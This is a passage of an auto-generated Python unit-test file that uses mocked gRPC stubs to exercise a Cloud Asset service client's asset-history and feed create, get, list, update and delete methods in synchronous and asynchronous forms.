assets=[
assets.Asset(),
],
next_page_token='ghi',
),
asset_service.ListAssetsResponse(
assets=[
assets.Asset(),
assets.Asset(),
],
),
RuntimeError,
)
pages = []
async for page_ in (await client.list_assets(request={})).pages:
pages.append(page_)
for page_, token in zip(pages, ['abc','def','ghi', '']):
assert page_.raw_page.next_page_token == token
def test_batch_get_assets_history(transport: str = 'grpc', request_type=asset_service.BatchGetAssetsHistoryRequest):
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.batch_get_assets_history),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.BatchGetAssetsHistoryResponse(
)
response = client.batch_get_assets_history(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.BatchGetAssetsHistoryRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, asset_service.BatchGetAssetsHistoryResponse)
def test_batch_get_assets_history_from_dict():
test_batch_get_assets_history(request_type=dict)
def test_batch_get_assets_history_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.batch_get_assets_history),
'__call__') as call:
client.batch_get_assets_history()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.BatchGetAssetsHistoryRequest()
@pytest.mark.asyncio
async def test_batch_get_assets_history_async(transport: str = 'grpc_asyncio', request_type=asset_service.BatchGetAssetsHistoryRequest):
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.batch_get_assets_history),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value =grpc_helpers_async.FakeUnaryUnaryCall(asset_service.BatchGetAssetsHistoryResponse(
))
response = await client.batch_get_assets_history(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.BatchGetAssetsHistoryRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, asset_service.BatchGetAssetsHistoryResponse)
@pytest.mark.asyncio
async def test_batch_get_assets_history_async_from_dict():
await test_batch_get_assets_history_async(request_type=dict)
def test_batch_get_assets_history_field_headers():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.BatchGetAssetsHistoryRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.batch_get_assets_history),
'__call__') as call:
call.return_value = asset_service.BatchGetAssetsHistoryResponse()
client.batch_get_assets_history(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_batch_get_assets_history_field_headers_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.BatchGetAssetsHistoryRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.batch_get_assets_history),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.BatchGetAssetsHistoryResponse())
await client.batch_get_assets_history(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
def test_create_feed(transport: str = 'grpc', request_type=asset_service.CreateFeedRequest):
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_feed),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.Feed(
name='name_value',
asset_names=['asset_names_value'],
asset_types=['asset_types_value'],
content_type=asset_service.ContentType.RESOURCE,
)
response = client.create_feed(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.CreateFeedRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, asset_service.Feed)
assert response.name == 'name_value'
assert response.asset_names == ['asset_names_value']
assert response.asset_types == ['asset_types_value']
assert response.content_type == asset_service.ContentType.RESOURCE
def test_create_feed_from_dict():
test_create_feed(request_type=dict)
def test_create_feed_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_feed),
'__call__') as call:
client.create_feed()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.CreateFeedRequest()
@pytest.mark.asyncio
async def test_create_feed_async(transport: str = 'grpc_asyncio', request_type=asset_service.CreateFeedRequest):
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_feed),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value =grpc_helpers_async.FakeUnaryUnaryCall(asset_service.Feed(
name='name_value',
asset_names=['asset_names_value'],
asset_types=['asset_types_value'],
content_type=asset_service.ContentType.RESOURCE,
))
response = await client.create_feed(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.CreateFeedRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, asset_service.Feed)
assert response.name == 'name_value'
assert response.asset_names == ['asset_names_value']
assert response.asset_types == ['asset_types_value']
assert response.content_type == asset_service.ContentType.RESOURCE
@pytest.mark.asyncio
async def test_create_feed_async_from_dict():
await test_create_feed_async(request_type=dict)
def test_create_feed_field_headers():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.CreateFeedRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_feed),
'__call__') as call:
call.return_value = asset_service.Feed()
client.create_feed(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_create_feed_field_headers_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.CreateFeedRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_feed),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.Feed())
await client.create_feed(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
def test_create_feed_flattened():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_feed),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.Feed()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.create_feed(
parent='parent_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].parent == 'parent_value'
def test_create_feed_flattened_error():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.create_feed(
asset_service.CreateFeedRequest(),
parent='parent_value',
)
@pytest.mark.asyncio
async def test_create_feed_flattened_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_feed),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.Feed()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.Feed())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.create_feed(
parent='parent_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].parent == 'parent_value'
@pytest.mark.asyncio
async def test_create_feed_flattened_error_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.create_feed(
asset_service.CreateFeedRequest(),
parent='parent_value',
)
def test_get_feed(transport: str = 'grpc', request_type=asset_service.GetFeedRequest):
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_feed),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.Feed(
name='name_value',
asset_names=['asset_names_value'],
asset_types=['asset_types_value'],
content_type=asset_service.ContentType.RESOURCE,
)
response = client.get_feed(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.GetFeedRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, asset_service.Feed)
assert response.name == 'name_value'
assert response.asset_names == ['asset_names_value']
assert response.asset_types == ['asset_types_value']
assert response.content_type == asset_service.ContentType.RESOURCE
def test_get_feed_from_dict():
test_get_feed(request_type=dict)
def test_get_feed_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_feed),
'__call__') as call:
client.get_feed()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.GetFeedRequest()
@pytest.mark.asyncio
async def test_get_feed_async(transport: str = 'grpc_asyncio', request_type=asset_service.GetFeedRequest):
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_feed),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value =grpc_helpers_async.FakeUnaryUnaryCall(asset_service.Feed(
name='name_value',
asset_names=['asset_names_value'],
asset_types=['asset_types_value'],
content_type=asset_service.ContentType.RESOURCE,
))
response = await client.get_feed(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.GetFeedRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, asset_service.Feed)
assert response.name == 'name_value'
assert response.asset_names == ['asset_names_value']
assert response.asset_types == ['asset_types_value']
assert response.content_type == asset_service.ContentType.RESOURCE
@pytest.mark.asyncio
async def test_get_feed_async_from_dict():
await test_get_feed_async(request_type=dict)
def test_get_feed_field_headers():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.GetFeedRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_feed),
'__call__') as call:
call.return_value = asset_service.Feed()
client.get_feed(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_get_feed_field_headers_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.GetFeedRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_feed),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.Feed())
await client.get_feed(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
def test_get_feed_flattened():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_feed),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.Feed()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_feed(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
def test_get_feed_flattened_error():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_feed(
asset_service.GetFeedRequest(),
name='name_value',
)
@pytest.mark.asyncio
async def test_get_feed_flattened_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_feed),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.Feed()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.Feed())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.get_feed(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
@pytest.mark.asyncio
async def test_get_feed_flattened_error_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.get_feed(
asset_service.GetFeedRequest(),
name='name_value',
)
def test_list_feeds(transport: str = 'grpc', request_type=asset_service.ListFeedsRequest):
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_feeds),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.ListFeedsResponse(
)
response = client.list_feeds(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.ListFeedsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, asset_service.ListFeedsResponse)
def test_list_feeds_from_dict():
test_list_feeds(request_type=dict)
def test_list_feeds_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_feeds),
'__call__') as call:
client.list_feeds()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.ListFeedsRequest()
@pytest.mark.asyncio
async def test_list_feeds_async(transport: str = 'grpc_asyncio', request_type=asset_service.ListFeedsRequest):
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_feeds),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value =grpc_helpers_async.FakeUnaryUnaryCall(asset_service.ListFeedsResponse(
))
response = await client.list_feeds(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.ListFeedsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, asset_service.ListFeedsResponse)
@pytest.mark.asyncio
async def test_list_feeds_async_from_dict():
await test_list_feeds_async(request_type=dict)
def test_list_feeds_field_headers():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.ListFeedsRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_feeds),
'__call__') as call:
call.return_value = asset_service.ListFeedsResponse()
client.list_feeds(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_list_feeds_field_headers_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.ListFeedsRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_feeds),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.ListFeedsResponse())
await client.list_feeds(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
def test_list_feeds_flattened():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_feeds),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.ListFeedsResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.list_feeds(
parent='parent_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].parent == 'parent_value'
def test_list_feeds_flattened_error():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list_feeds(
asset_service.ListFeedsRequest(),
parent='parent_value',
)
@pytest.mark.asyncio
async def test_list_feeds_flattened_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_feeds),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.ListFeedsResponse()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.ListFeedsResponse())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.list_feeds(
parent='parent_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].parent == 'parent_value'
@pytest.mark.asyncio
async def test_list_feeds_flattened_error_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.list_feeds(
asset_service.ListFeedsRequest(),
parent='parent_value',
)
def test_update_feed(transport: str = 'grpc', request_type=asset_service.UpdateFeedRequest):
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_feed),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.Feed(
name='name_value',
asset_names=['asset_names_value'],
asset_types=['asset_types_value'],
content_type=asset_service.ContentType.RESOURCE,
)
response = client.update_feed(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.UpdateFeedRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, asset_service.Feed)
assert response.name == 'name_value'
assert response.asset_names == ['asset_names_value']
assert response.asset_types == ['asset_types_value']
assert response.content_type == asset_service.ContentType.RESOURCE
def test_update_feed_from_dict():
test_update_feed(request_type=dict)
def test_update_feed_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_feed),
'__call__') as call:
client.update_feed()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.UpdateFeedRequest()
@pytest.mark.asyncio
async def test_update_feed_async(transport: str = 'grpc_asyncio', request_type=asset_service.UpdateFeedRequest):
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_feed),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value =grpc_helpers_async.FakeUnaryUnaryCall(asset_service.Feed(
name='name_value',
asset_names=['asset_names_value'],
asset_types=['asset_types_value'],
content_type=asset_service.ContentType.RESOURCE,
))
response = await client.update_feed(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.UpdateFeedRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, asset_service.Feed)
assert response.name == 'name_value'
assert response.asset_names == ['asset_names_value']
assert response.asset_types == ['asset_types_value']
assert response.content_type == asset_service.ContentType.RESOURCE
@pytest.mark.asyncio
async def test_update_feed_async_from_dict():
await test_update_feed_async(request_type=dict)
def test_update_feed_field_headers():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.UpdateFeedRequest()
request.feed.name = 'feed.name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_feed),
'__call__') as call:
call.return_value = asset_service.Feed()
client.update_feed(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'feed.name=feed.name/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_update_feed_field_headers_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.UpdateFeedRequest()
request.feed.name = 'feed.name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_feed),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.Feed())
await client.update_feed(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'feed.name=feed.name/value',
) in kw['metadata']
def test_update_feed_flattened():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_feed),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.Feed()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.update_feed(
feed=asset_service.Feed(name='name_value'),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].feed == asset_service.Feed(name='name_value')
def test_update_feed_flattened_error():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.update_feed(
asset_service.UpdateFeedRequest(),
feed=asset_service.Feed(name='name_value'),
)
@pytest.mark.asyncio
async def test_update_feed_flattened_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_feed),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.Feed()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.Feed())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.update_feed(
feed=asset_service.Feed(name='name_value'),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].feed == asset_service.Feed(name='name_value')
@pytest.mark.asyncio
async def test_update_feed_flattened_error_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.update_feed(
asset_service.UpdateFeedRequest(),
feed=asset_service.Feed(name='name_value'),
)
def test_delete_feed(transport: str = 'grpc', request_type=asset_service.DeleteFeedRequest):
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_feed),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = None
response = client.delete_feed(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.DeleteFeedRequest()
# Establish that the response is the type that we expect.
assert response is None
def test_delete_feed_from_dict():
test_delete_feed(request_type=dict)
def test_delete_feed_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_feed),
'__call__') as call:
client.delete_feed()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.DeleteFeedRequest()
@pytest.mark.asyncio
async def test_delete_feed_async(transport: str = 'grpc_asyncio', request_type=asset_service.DeleteFeedRequest):
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_feed),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
response = await client.delete_feed(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.DeleteFeedRequest()
# Establish that the response is the type that we expect.
assert response is None
@pytest.mark.asyncio
async def test_delete_feed_async_from_dict():
await test_delete_feed_async(request_type=dict)
def test_delete_feed_field_headers():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.DeleteFeedRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_feed),
'__call__') as call:
call.return_value = None
client.delete_feed(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_delete_feed_field_headers_async():
client = AssetServiceAsyncClient(
